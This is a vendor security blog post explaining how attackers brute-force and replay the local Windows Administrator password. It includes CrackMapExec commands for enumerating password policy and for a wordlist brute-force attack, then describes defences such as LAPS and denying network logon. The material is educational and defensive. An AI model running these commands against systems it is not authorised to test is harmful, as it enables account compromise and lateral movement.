So far in this series, we’ve learned how attackers can target weak domain passwords in Active Directory. To complete the story, we need to look beyond domain accounts and understand the ways to attack local accounts on Windows servers and desktops. For this post, we will focus on the most important local account: Administrator. The Administrator account is built into every Windows operating system and provides full control over the system, including the ability to compromise domain accounts through pass-the-hash and pass-the-ticket attacks.
The Administrator account is vulnerable to password attacks for two reasons:
Let’s walk through a typical attack against the Administrator account using our favorite application CrackMapExec.
Because the Administrator account has no lockout policy at all, it is possible to make unlimited guesses of what the account’s password is. Using password lists, like the SecList collections, you can craft a custom list of well-known passwords to use to crack the Administrator account.
To create a more targeted account, you can enumerate the password policy on the target systems. This will tell you what the minimum password length and password complexity settings are, so you can craft your list of only viable passwords.
By issuing this command against a member server or workstation, it will return local policy information.
cme smb [hostname or list] –u [username] –p [password] –pass-pol
Once you have your password dictionary, the following command will run a brute-force attack against the local Administrator account until it is successfully cracked.
cme smb [hostname or list] –u Administrator –d builtin –p [password list]
Here you can see I clearly exceeded the local account lockout policy of 10 bad passwords, but was still able to compromise the password of the account in plain text.
The other common exploit of the local Administrator account is to replay the password against other systems in the environment. This is typically successful because it can be difficult to set and manage different passwords for the Administrator account across each endpoint. Therefore attackers can use lateral movement attacks to go from compromising a single machine to a large number of machines very easily.
Fortunately there are several effective ways to protect yourself from password attacks against local Administrator accounts. One effective way is to disable the account entirely, and create a new administrative account in its place. Alternatively, Microsoft provides a useful tool called the Local Administrator Password Solution (LAPS). LAPS will automatically randomize the Administrator passwords across domain-joined computers and store the secrets centrally within Active Directory. This can guarantee passwords are long and complex, and not reused across multiple computers. This alone will prevent these types of attacks from happening.
Another useful protection is to leverage the Local account and member of Administrators group security principal to deny network logon rights. By leveraging this security principal (available in 2008 R2 or later) will prevent the password replay attack against local accounts.
Previous blog posts in the series:
Jeff Warren is Stealthbits’ General Manager of Products. Jeff has held multiple roles within the Technical Product Management group since joining the organization in 2010, initially building Stealthbits’ SharePoint management offerings before shifting focus to the organization’s Data Access Governance solution portfolio as a whole. Before joining Stealthbits, Jeff was a Software Engineer at Wall Street Network, a solutions provider specializing in GIS software and custom SharePoint development.
With deep knowledge and experience in technology, product and project management, Jeff and his teams are responsible for designing and delivering Stealthbits’ high quality, innovative solutions.
Jeff holds a Bachelor of Science degree in Information Systems from the University of Delaware.
Learn why Active Directory security should be a priority for your organization and ways to mitigate against a data breach with this free white paper!Read more
Start a Free Stealthbits Trial!
No risk. No obligation.